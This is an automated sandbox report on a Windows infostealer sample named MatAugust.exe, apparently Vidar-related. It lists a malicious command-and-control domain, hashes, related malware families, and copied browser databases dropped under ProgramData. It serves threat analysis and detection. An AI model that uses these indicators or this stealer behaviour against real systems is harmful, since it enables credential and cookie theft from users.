https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000011.00000002.2062809117.0000250C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002350605.0000250C01328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002147574.0000250C01278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3970	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW	chrome.exe, 00000011.00000002.2066836064.0000250C00E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
116.203.14.4	sdoout.lol	Germany	24940	HETZNER-ASDE	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
142.250.181.238	play.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.16.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582850
Start date and time:	2024-12-31 16:56:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MatAugust.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@47/49@9/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 36
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.22.50.144, 192.229.221.95, 172.217.18.3, 142.250.186.46, 74.125.133.84, 172.217.18.14, 142.250.185.227, 142.250.184.238, 142.250.186.174, 142.250.185.138, 172.217.18.10, 172.217.16.202, 142.250.185.106, 142.250.185.170, 142.250.186.106, 142.250.185.234, 142.250.186.138, 142.250.186.42, 142.250.184.202, 142.250.185.74, 216.58.212.138, 216.58.206.74, 142.250.186.74, 142.250.185.202, 142.250.184.234, 142.250.65.174, 74.125.0.137, 4.175.87.197, 184.28.90.27, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, r4.sn-ab5l6nk6.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, r4---sn-ab5l6nk6.gvt1.com, clients.l.google.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:57:08	API Interceptor	1x Sleep call for process: MatAugust.exe modified
10:57:15	API Interceptor	1x Sleep call for process: Stopped.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	http://trezorbridge.org/	Get hash	malicious	Unknown	Browse
	http://knoxoms.com	Get hash	malicious	Unknown	Browse
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse
	https://br.custmercompa.de/	Get hash	malicious	Unknown	Browse
	http://usps.com-trackaddn.top/l	Get hash	malicious	Unknown	Browse
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse
116.203.14.4	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://linkenbio.net/59125/247	Get hash	malicious	Unknown	Browse	149.154.167.99
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	installer.bat	Get hash	malicious	Vidar	Browse	149.154.167.99
	skript.bat	Get hash	malicious	Vidar	Browse	149.154.167.99
	din.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	yoda.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
sdoout.lol	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	116.203.14.4
sdoout.lol	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	116.203.14.4
plus.l.google.com	http://usps.com-trackaddn.top/l	Get hash	malicious	Unknown	Browse	142.250.186.174
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	216.58.206.46
	https://tepco-jp-lin;.%5Dshop/co/tepco	Get hash	malicious	Unknown	Browse	172.217.16.206
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	216.58.206.78
	random.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.184.238
	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.217.17.46
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.181.78
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.181.78
	http://tubnzy3uvz.top/1.php?s=527	Get hash	malicious	Unknown	Browse	172.217.17.46
	http://poubnxu3jubz.top/1.php	Get hash	malicious	Unknown	Browse	142.250.181.78

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	iviewers.dll	Get hash	malicious	LummaC	Browse	149.154.167.220
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	149.154.167.220
HETZNER-ASDE	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	116.203.14.4
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	88.198.193.213
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	116.203.14.4
	botx.ppc.elf	Get hash	malicious	Mirai	Browse	49.13.202.247
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	116.203.14.4
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	5.9.64.57
	Electrum-bch-4.4.2-x86_64.AppImage.elf	Get hash	malicious	Unknown	Browse	136.243.250.139
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	116.203.8.178
	db0fa4b8db0333367e9bda3ab68b8042.m68k.elf	Get hash	malicious	Mirai, Gafgyt	Browse	144.79.90.49
	0A7XTINw3R.exe	Get hash	malicious	Unknown	Browse	178.63.67.153

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	DypA6KbLrn.lnk	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	IOnqEVA4Dz.lnk	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	HngJMpDqxP.lnk	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	setup.msi	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	GYede3Gwn0.lnk	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	116.203.14.4 149.154.167.99
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	116.203.14.4 149.154.167.99
	zku4YyCG6L.exe	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	hca5qDUYZH.exe	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	Loader.exe	Get hash	malicious	Meduza Stealer	Browse	116.203.14.4 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse
	AquaPac.exe	Get hash	malicious	LummaC Stealer	Browse
	0442.pdf.exe	Get hash	malicious	Remcos	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	!Set-up..exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\wlxlf\16xlfu

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\wlxlf\37ycjm

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\wlxlf\4wln7gvsr

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\wlxlf\5fk6fu

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\wlxlf\8900hv

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\wlxlf\c2no8yc2d

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\wlxlf\cjw47q

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\wlxlf\jw4wb1

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\wlxlf\wlngd2

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 6684V5n83w.exe, Detection: malicious, Browse Filename: vlid_acid.exe, Detection: malicious, Browse Filename: AquaPac.exe, Detection: malicious, Browse Filename: 0442.pdf.exe, Detection: malicious, Browse Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: !Set-up..exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse Filename: TNyOrM6mIM.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\h

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	524150
Entropy (8bit):	7.999648195093761
Encrypted:	true
SSDEEP:	12288:olQrDDU1sW+ow6HM3+E/s48yX9FipCq06zHJsMFrwA4u:yQrU1s5WsOEk48ytF+06zHtFrUu
MD5:	52B78F78FF435289F3F1843C52ADA79B
SHA1:	5B6A57B9788084319EE3045719196FF1568EC817
SHA-256:	165BC09794A9C080E326459FACA48AAF86B4927637EA857583A80EE7EF2B223A
SHA-512:	C94666E9A7FDB3F4D0061E1FD62FD926A78A1193850EA265B4C076CFE3A619E7EEAA6F7DE40E2698C87D8EEADF904DA6AE9DDA1380D5556F4E67E9B7DD9C2D8D
Malicious:	false
Preview:	^.K...S..>..cC.l......=....i..A.K..q....0l.".h.(..P}...,...W....o..7...0b..c..~}Y..^......."..o........g.Li..$.Hk..;..Ig.M.s.h.`.O....g...@Z.E.=.3.c...@......x......Vv...7.z...,...".j.......13.^D.v...F...I.3K..Cs%u...+..Hw..hO.`.[ba.%E..\|.....qO...ag.Z.......e...-i..I.h..Z.C...........s%...}....D...\|8...........Lv....-.V......B.....i.R(.Y....<1>.6G.-%u...-.`.!..........o.fCk...Q{.\.w...D.N!....$..Ps.....ix.,\....P9..!.6..........]+`p..TP<..!.<%..ZR...=f./...s.Oz.%.x.p..1dDI.1Qf....}"....kR.u.......FR.......Q.. ...........[\;LH..gi.............'.Y..CM[.OLY.qgO..\.)Ws..:.L....5..[..$.A...".Qj#....V...T...2..S.t...8...Z\.L.m.z>.66..<0...y.8...v~.Tv..9}_....8.BE..hph.i.*N.!.H..._... .......A.....s......?"\.Xz....X;...j.S.n..:+.}..I9..4h...6L).h..X....\I.h2.0...?/..Y'.....UE..-...r.T....6.x.tN.W.vD1.m...?.Am...Y.r.....g.Hz..\..Id...z..K^.....v\|..............Z..`...O...r..C.&........@..e...{.<.....GTG..........(.w.........o....W..:..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Born

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	120832
Entropy (8bit):	4.734403049940509
Encrypted:	false
SSDEEP:	768:ux/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWelz:udKaj6iTcPAsAhxjgarB/5elz
MD5:	9E3D1257DE29104ACBC0FB84C9E4D1B4
SHA1:	7F88FD85BF4A8C4A9538481190CDDA188B4E4E15
SHA-256:	FD62C3D04E17AA63D9663F499CF52907ED1E1E62FF47F508EC5AC7F4123438E2
SHA-512:	DFD248D0143FAAAC0B7AB371AE4F577BC59ACB87748354D359DCDF759EF9937AA682656F9D0AEF7E7BC8018FA526DB43BF07CB8AAF7D74B02D52EFC77FD2A5BA
Malicious:	false
Preview:	.r.r.r.r.r.".".".".r.".".".".".".".r.".".".r.".r.".r.r.".".r.".".".".#.".$.#.#.#.#.#.#.r.#.#.".r.r.".".".".".r.%.r.#.#.#.#.#.#.r.r.&.&.&.&.&.&.&.&.&.&.r.r.".".".".r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.'.(.(.(.).).).).).).).).).).).).).).).(.).(.(.(...(.(.(.(.(.(.+.+.+.+.+.+.+.+.+.+.,.,.,.,.,.,.,.,.,.,.(..(..(..-...-..././.'.'.'.'.'.'.'.'.r.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.r.r.r.r.............../......)...'.'.'.'.'............r.....................................r.(.(.(.(.(.(.(.(..(.(.(.(.(.(.r.(.(.).).).).).........).).r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.2.2.2.2.3.2.2.2.2.2.2.1.2.2.3.3.2.2.0.4.4.4.4.4.4.4.4.4.4.5.5.5.5.5.5.0.0.0.0.0.0.3.3.2.2.0.0.0.0.2.2.2.0.1.1.1.0.0.1.1.1.1.1.1.1.0.0.0.2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2

